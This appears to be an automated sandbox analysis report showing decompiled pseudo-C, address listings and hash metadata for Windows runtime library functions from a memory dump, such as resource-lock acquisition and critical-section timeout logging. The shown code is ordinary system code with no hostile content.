                                                                                        										_t106 = _t93;
                                                                                        										__eflags = _t93;
                                                                                        										if(_t93 > 0) {
                                                                                        											continue;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									__eflags = _t106;
                                                                                        								}
                                                                                        								if(__eflags != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L23;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L58;
                                                                                        					}
                                                                                        					_t84 = _t115;
                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                        					__eflags = _t84 - _t115;
                                                                                        					if(_t84 != _t115) {
                                                                                        						_t115 = _t84;
                                                                                        						goto L7;
                                                                                        					} else {
                                                                                        						return 1;
                                                                                        					}
                                                                                        				}
                                                                                        				L58:
                                                                                        			}



































                                                                                        0x00ad22e6
                                                                                        0x00ad22e9
                                                                                        0x00ad22f4
                                                                                        0x00ad22f9
                                                                                        0x00ad22fa
                                                                                        0x00ad2305
                                                                                        0x00ad2314
                                                                                        0x00ad2319
                                                                                        0x00ad231a
                                                                                        0x00ad231d
                                                                                        0x00ad2320
                                                                                        0x00ad2323
                                                                                        0x00ad2323
                                                                                        0x00ad2328
                                                                                        0x00ad232d
                                                                                        0x00ad232f
                                                                                        0x00ad2331
                                                                                        0x00ad2336
                                                                                        0x00ad2336
                                                                                        0x00ad233b
                                                                                        0x00ad233d
                                                                                        0x00ad2350
                                                                                        0x00ad2351
                                                                                        0x00ad2356
                                                                                        0x00ad2359
                                                                                        0x00ad2359
                                                                                        0x00ad235b
                                                                                        0x00ad235d
                                                                                        0x00a95367
                                                                                        0x00a9536b
                                                                                        0x00a95372
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad2363
                                                                                        0x00ad2363
                                                                                        0x00ad2369
                                                                                        0x00ad236a
                                                                                        0x00ad236c
                                                                                        0x00ad2371
                                                                                        0x00ad2373
                                                                                        0x00000000
                                                                                        0x00ad2379
                                                                                        0x00ad2379
                                                                                        0x00ad237a
                                                                                        0x00ad237f
                                                                                        0x00ad237f
                                                                                        0x00ad2385
                                                                                        0x00ad2386
                                                                                        0x00ad2389
                                                                                        0x00ad238e
                                                                                        0x00ad2390
                                                                                        0x00a95378
                                                                                        0x00a9537c
                                                                                        0x00ad2396
                                                                                        0x00ad2396
                                                                                        0x00ad2397
                                                                                        0x00ad239c
                                                                                        0x00ad23a2
                                                                                        0x00ad23a3
                                                                                        0x00ad23a6
                                                                                        0x00ad23ab
                                                                                        0x00ad23ad
                                                                                        0x00000000
                                                                                        0x00ad23b3
                                                                                        0x00ad23b3
                                                                                        0x00ad23b4
                                                                                        0x00ad23b9
                                                                                        0x00ad23ba
                                                                                        0x00ad23ba
                                                                                        0x00ad23bc
                                                                                        0x00ad23bf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac9153
                                                                                        0x00ac9158
                                                                                        0x00ac915a
                                                                                        0x00ac915e
                                                                                        0x00ac9160
                                                                                        0x00000000
                                                                                        0x00ac9166
                                                                                        0x00ac9166
                                                                                        0x00ac9171
                                                                                        0x00ac9176
                                                                                        0x00ac9176
                                                                                        0x00000000
                                                                                        0x00ac9160
                                                                                        0x00ad23c6
                                                                                        0x00ad23d7
                                                                                        0x00ad23d7
                                                                                        0x00ad23ad
                                                                                        0x00ad2390
                                                                                        0x00ad2373
                                                                                        0x00ad233f
                                                                                        0x00ad233f
                                                                                        0x00000000
                                                                                        0x00ad233f
                                                                                        0x00ad2291
                                                                                        0x00ad2291
                                                                                        0x00ad2293
                                                                                        0x00ad2295
                                                                                        0x00ad229a
                                                                                        0x00ad22a1
                                                                                        0x00ad22a3
                                                                                        0x00ad22a7
                                                                                        0x00ad22a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22ab
                                                                                        0x00ad22ad
                                                                                        0x00ad22af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22af
                                                                                        0x00ad22b1
                                                                                        0x00ad22b4
                                                                                        0x00ad22b4
                                                                                        0x00ad22b6
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953be
                                                                                        0x00a953c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00a953cb
                                                                                        0x00a953ce
                                                                                        0x00a953d0
                                                                                        0x00a953d4
                                                                                        0x00a953d6
                                                                                        0x00000000
                                                                                        0x00a953d8
                                                                                        0x00a953e3
                                                                                        0x00a953ea
                                                                                        0x00a953ea
                                                                                        0x00000000
                                                                                        0x00a953d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad22b6
                                                                                        0x00000000
                                                                                        0x00ad228f
                                                                                        0x00ad2349
                                                                                        0x00ad234d
                                                                                        0x00ad2251
                                                                                        0x00ad2251
                                                                                        0x00000000
                                                                                        0x00ad2251
                                                                                        0x00ad21a4
                                                                                        0x00ad21a4
                                                                                        0x00ad21a6
                                                                                        0x00ad21a8
                                                                                        0x00ad21ac
                                                                                        0x00ad21b6
                                                                                        0x00ad21b8
                                                                                        0x00ad21bc
                                                                                        0x00ad21be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c0
                                                                                        0x00ad21c2
                                                                                        0x00ad21c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c4
                                                                                        0x00ad21c6
                                                                                        0x00ad21c6
                                                                                        0x00ad21c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ad21c8
                                                                                        0x00ad21a2
                                                                                        0x00000000
                                                                                        0x00ad2183
                                                                                        0x00ab057b
                                                                                        0x00ab057d
                                                                                        0x00ab0581
                                                                                        0x00ab0583
                                                                                        0x00ad2178
                                                                                        0x00000000
                                                                                        0x00ab0589
                                                                                        0x00ab058f
                                                                                        0x00ab058f
                                                                                        0x00ab0583
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD2206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-4236105082
                                                                                        • Opcode ID: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                                                        • Instruction ID: 1bd93c8488373b71905e1c8b4630c2df579ce163bbfd0c77ee2a0a865f7c9e53
                                                                                        • Opcode Fuzzy Hash: 85af7e9114e9fec68c2407062f64ffa0db9f78defb36c103ec9f307467efee1e
                                                                                        • Instruction Fuzzy Hash: 2851FC327042116FDB159B14CC81FA673A9AFA8720F21C66AFD5ADF386DA71EC41C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E00AB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                        				signed int _v8;
                                                                                        				char _v10;
                                                                                        				char _v140;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t24;
                                                                                        				void* _t26;
                                                                                        				signed int _t29;
                                                                                        				signed int _t34;
                                                                                        				signed int _t40;
                                                                                        				intOrPtr _t45;
                                                                                        				void* _t51;
                                                                                        				intOrPtr* _t52;
                                                                                        				void* _t54;
                                                                                        				signed int _t57;
                                                                                        				void* _t58;
                                                                                        
                                                                                        				_t51 = __edx;
                                                                                        				_t24 =  *0xb52088; // 0x77499e17
                                                                                        				_v8 = _t24 ^ _t57;
                                                                                        				_t45 = _a16;
                                                                                        				_t53 = _a4;
                                                                                        				_t52 = _a20;
                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                        					L10:
                                                                                        					_t26 = 0xc000000d;
                                                                                        				} else {
                                                                                        					if(_t45 == 0) {
                                                                                        						if( *_t52 == _t45) {
                                                                                        							goto L3;
                                                                                        						} else {
                                                                                        							goto L10;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L3:
                                                                                        						_t28 =  &_v140;
                                                                                        						if(_a12 != 0) {
                                                                                        							_push("[");
                                                                                        							_push(0x41);
                                                                                        							_push( &_v140);
                                                                                        							_t29 = E00AA7707();
                                                                                        							_t58 = _t58 + 0xc;
                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                        						}
                                                                                        						_t54 = E00AB13CB(_t53, _t28);
                                                                                        						if(_a8 != 0) {
                                                                                        							_t34 = E00AA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                        							_t58 = _t58 + 0x10;
                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                        						}
                                                                                        						if(_a12 != 0) {
                                                                                        							_t40 = E00AA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                        							_t58 = _t58 + 0x10;
                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                        						}
                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                        						 *_t52 = _t53;
                                                                                        						if( *_t52 < _t53) {
                                                                                        							goto L10;
                                                                                        						} else {
                                                                                        							E00A72340(_t45,  &_v140, _t53 + _t53);
                                                                                        							_t26 = 0;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				return E00A7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                        			}





















                                                                                        APIs
                                                                                        • ___swprintf_l.LIBCMT ref: 00ADEA22
                                                                                          • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB146B
                                                                                          • Part of subcall function 00AB13CB: ___swprintf_l.LIBCMT ref: 00AB1490
                                                                                        • ___swprintf_l.LIBCMT ref: 00AB156D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                                                        • Instruction ID: 3e4ed00255f70ca0db467dfbb1e8b9f7557caccd607026d6cbaab95e543ba714
                                                                                        • Opcode Fuzzy Hash: 6a5454181616635a1f7acfe7fe69692efcdc65e5c4678d64dedfafbea179ccc2
                                                                                        • Instruction Fuzzy Hash: F521C372900219ABCB30DF54CD51AEF73BCBB50701F848552FC4AD7142DB70AA598BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 44%
                                                                                        			E00A953A5(signed int _a4, char _a8) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t32;
                                                                                        				signed int _t37;
                                                                                        				signed int _t40;
                                                                                        				signed int _t42;
                                                                                        				void* _t45;
                                                                                        				intOrPtr _t46;
                                                                                        				signed int _t49;
                                                                                        				void* _t51;
                                                                                        				signed int _t57;
                                                                                        				signed int _t64;
                                                                                        				signed int _t71;
                                                                                        				void* _t74;
                                                                                        				intOrPtr _t78;
                                                                                        				signed int* _t79;
                                                                                        				void* _t85;
                                                                                        				signed int _t86;
                                                                                        				signed int _t92;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        
                                                                                        				_t64 = _a4;
                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                        				_t71 = _t64 + 0x28;
                                                                                        				_push(_t92);
                                                                                        				if(_t32 < 0) {
                                                                                        					_t78 =  *[fs:0x18];
                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                        						asm("lock xadd [ecx], eax");
                                                                                        						return 1;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L3:
                                                                                        					_push(_t86);
                                                                                        					while(1) {
                                                                                        						L4:
                                                                                        						__eflags = _t32;
                                                                                        						if(_t32 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						__eflags = _a8;
                                                                                        						if(_a8 == 0) {
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                        							_t79 = _t64 + 0x24;
                                                                                        							_t71 = 1;
                                                                                        							asm("lock xadd [eax], ecx");
                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                        							_a4 = _t32;
                                                                                        							__eflags = _t32;
                                                                                        							if(_t32 != 0) {
                                                                                        								L19:
                                                                                        								_t86 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                        									asm("sbb esi, esi");
                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b501c0;
                                                                                        									_push(_t92);
                                                                                        									_push(0);
                                                                                        									_t37 = E00A6F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                        									__eflags = _t37 - 0x102;
                                                                                        									if(_t37 != 0x102) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t71 =  *(_t92 + 4);
                                                                                        									_t85 =  *_t92;
                                                                                        									_t51 = E00AB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                        									_push(_t85);
                                                                                        									_push(_t51);
                                                                                        									E00AC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                        									E00AC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                        									_t86 = _t86 + 1;
                                                                                        									_t105 = _t104 + 0x28;
                                                                                        									__eflags = _t86 - 2;
                                                                                        									if(__eflags > 0) {
                                                                                        										E00AF217A(_t71, __eflags, _t64);
                                                                                        									}
                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                        									_push(0);
                                                                                        									_push(0x65);
                                                                                        									E00AC3F92();
                                                                                        									_t104 = _t105 + 0xc;
                                                                                        								}
                                                                                        								__eflags = _t37;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t37);
                                                                                        									E00AB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                        									asm("int3");
                                                                                        									_t40 =  *_t71;
                                                                                        									 *_t71 = 0;
                                                                                        									__eflags = _t40;
                                                                                        									if(_t40 == 0) {
                                                                                        										L1:
                                                                                        										_t42 = E00A95384(_t92 + 0x24);
                                                                                        										if(_t42 != 0) {
                                                                                        											goto L31;
                                                                                        										} else {
                                                                                        											goto L2;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                        										_push( &_a4);
                                                                                        										_push(_t40);
                                                                                        										_t49 = E00A6F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                        										__eflags = _t49;
                                                                                        										if(__eflags >= 0) {
                                                                                        											goto L1;
                                                                                        										} else {
                                                                                        											_push(_t49);
                                                                                        											E00AB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                        											L31:
                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                        											_push( &_a4);
                                                                                        											_push(1);
                                                                                        											_t42 = E00A6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                        											__eflags = _t42;
                                                                                        											if(__eflags >= 0) {
                                                                                        												L2:
                                                                                        												return _t42;
                                                                                        											} else {
                                                                                        												_push(_t42);
                                                                                        												E00AB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                        												_push( &_a4);
                                                                                        												_push(1);
                                                                                        												_t42 = E00A6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                        												__eflags = _t42;
                                                                                        												if(__eflags >= 0) {
                                                                                        													goto L2;
                                                                                        												} else {
                                                                                        													_push(_t42);
                                                                                        													_t45 = E00AB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                        													asm("int3");
                                                                                        													while(1) {
                                                                                        														_t74 = _t45;
                                                                                        														__eflags = _t45 - 1;
                                                                                        														if(_t45 != 1) {
                                                                                        															break;
                                                                                        														}
                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                        														_t45 = _t74;
                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                        														__eflags = _t45 - _t74;
                                                                                        														if(_t45 != _t74) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															_t46 =  *[fs:0x18];
                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                        															return _t46;
                                                                                        														}
                                                                                        														goto L37;
                                                                                        													}
                                                                                        													E00A95329(_t74, _t92);
                                                                                        													_push(1);
                                                                                        													return E00A953A5(_t92);
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                        									continue;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t71 =  *_t79;
                                                                                        								__eflags = _t71;
                                                                                        								if(__eflags > 0) {
                                                                                        									while(1) {
                                                                                        										_t57 = _t71;
                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                        										__eflags = _t57 - _t71;
                                                                                        										if(_t57 == _t71) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t71 = _t57;
                                                                                        										__eflags = _t57;
                                                                                        										if(_t57 > 0) {
                                                                                        											continue;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									_t32 = _a4;
                                                                                        									__eflags = _t71;
                                                                                        								}
                                                                                        								if(__eflags != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L19;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L37;
                                                                                        					}
                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                        					_t32 = 0;
                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                        					__eflags = 0;
                                                                                        					if(0 != 0) {
                                                                                        						goto L4;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                        						return 1;
                                                                                        					}
                                                                                        				}
                                                                                        				L37:
                                                                                        			}


























                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 00AD2328
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                                                        • RTL: Resource at %p, xrefs: 00AD230B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-871070163
                                                                                        • Opcode ID: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                                                        • Instruction ID: cd9ccc99a3cf90f74e2ff6bb3b61c0381724d4bc931ada5cbeb2ee8193e732a4
                                                                                        • Opcode Fuzzy Hash: 5189a99850aa26316d77cb03b2657120cf866b34c0005c551db56666a78de101
                                                                                        • Instruction Fuzzy Hash: 9051D4727006056BDF119B38DD92FA773E8AF58360F11462AF919DF282EA61E941C7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 51%
                                                                                        			E00A9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                        				intOrPtr _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				signed int _v24;
                                                                                        				intOrPtr* _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				short _v66;
                                                                                        				char _v72;
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t38;
                                                                                        				intOrPtr _t39;
                                                                                        				signed int _t40;
                                                                                        				intOrPtr _t42;
                                                                                        				intOrPtr _t43;
                                                                                        				signed int _t44;
                                                                                        				void* _t46;
                                                                                        				intOrPtr _t48;
                                                                                        				signed int _t49;
                                                                                        				intOrPtr _t50;
                                                                                        				intOrPtr _t53;
                                                                                        				signed char _t67;
                                                                                        				void* _t72;
                                                                                        				intOrPtr _t77;
                                                                                        				intOrPtr* _t80;
                                                                                        				intOrPtr _t84;
                                                                                        				intOrPtr* _t85;
                                                                                        				void* _t91;
                                                                                        				void* _t92;
                                                                                        				void* _t93;
                                                                                        
                                                                                        				_t80 = __edi;
                                                                                        				_t75 = __edx;
                                                                                        				_t70 = __ecx;
                                                                                        				_t84 = _a4;
                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                        					E00A8DA92(__ecx, __edx, __eflags, _t84);
                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                        				}
                                                                                        				_push(0);
                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                        				if(_t38 == 0xffffffff) {
                                                                                        					_t39 =  *0xb5793c; // 0x0
                                                                                        					_push(0);
                                                                                        					_push(_t84);
                                                                                        					_t40 = E00A716C0(_t39);
                                                                                        				} else {
                                                                                        					_t40 = E00A6F9D4(_t38);
                                                                                        				}
                                                                                        				_pop(_t85);
                                                                                        				__eflags = _t40;
                                                                                        				if(__eflags < 0) {
                                                                                        					_push(_t40);
                                                                                        					E00AB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                        					asm("int3");
                                                                                        					while(1) {
                                                                                        						L21:
                                                                                        						_t76 =  *[fs:0x18];
                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                        							_v66 = 0x1722;
                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_t76 =  &_v72;
                                                                                        							_push( &_v72);
                                                                                        							_v28 = _t85;
                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_push(0x10);
                                                                                        							_push(0x20402);
                                                                                        							E00A701A4( *0x7ffe0382 & 0x000000ff);
                                                                                        						}
                                                                                        						while(1) {
                                                                                        							_t43 = _v8;
                                                                                        							_push(_t80);
                                                                                        							_push(0);
                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                        							if(_t43 == 0xffffffff) {
                                                                                        								_t71 =  *0xb5793c; // 0x0
                                                                                        								_push(_t85);
                                                                                        								_t44 = E00A71F28(_t71);
                                                                                        							} else {
                                                                                        								_t44 = E00A6F8CC(_t43);
                                                                                        							}
                                                                                        							__eflags = _t44 - 0x102;
                                                                                        							if(_t44 != 0x102) {
                                                                                        								__eflags = _t44;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t44);
                                                                                        									E00AB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                        									asm("int3");
                                                                                        									E00AF2306(_t85);
                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                        										_t72 = _t7;
                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                        										__eflags = _t67 - _t67;
                                                                                        										if(_t67 == _t67) {
                                                                                        											E00A9EC56(_t72, _t76, _t80, _t85);
                                                                                        										}
                                                                                        									}
                                                                                        									return 0;
                                                                                        								} else {
                                                                                        									__eflags = _v24;
                                                                                        									if(_v24 != 0) {
                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                        									}
                                                                                        									return 2;
                                                                                        								}
                                                                                        								goto L36;
                                                                                        							}
                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                        							_push(_t67);
                                                                                        							_t46 = E00AB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                        							_push(_t77);
                                                                                        							E00AC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                        							_t48 =  *_t85;
                                                                                        							_t92 = _t91 + 0x18;
                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                        							if(_t48 == 0xffffffff) {
                                                                                        								_t49 = 0;
                                                                                        								__eflags = 0;
                                                                                        							} else {
                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                        							}
                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_push(_t49);
                                                                                        							_t50 = _v12;
                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                        							_push(_t85);
                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                        							E00AC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                        							_t53 =  *_t85;
                                                                                        							_t93 = _t92 + 0x20;
                                                                                        							_t67 = _t67 + 1;
                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                        							if(_t53 != 0xffffffff) {
                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                        							}
                                                                                        							__eflags = _t67 - 2;
                                                                                        							if(_t67 > 2) {
                                                                                        								__eflags = _t85 - 0xb520c0;
                                                                                        								if(_t85 != 0xb520c0) {
                                                                                        									_t76 = _a4;
                                                                                        									__eflags = _a4 - _a8;
                                                                                        									if(__eflags == 0) {
                                                                                        										E00AF217A(_t71, __eflags, _t85);
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                        							_push(0);
                                                                                        							_push(0x65);
                                                                                        							_a8 = _a4;
                                                                                        							E00AC3F92();
                                                                                        							_t91 = _t93 + 0xc;
                                                                                        							__eflags =  *0x7ffe0382;
                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                        								goto L21;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L36;
                                                                                        					}
                                                                                        				} else {
                                                                                        					return _t40;
                                                                                        				}
                                                                                        				L36:
                                                                                        			}


































                                                                                        Strings
                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AD248D
                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AD24BD
                                                                                        • RTL: Re-Waiting, xrefs: 00AD24FA
                                                                                        Memory Dump Source
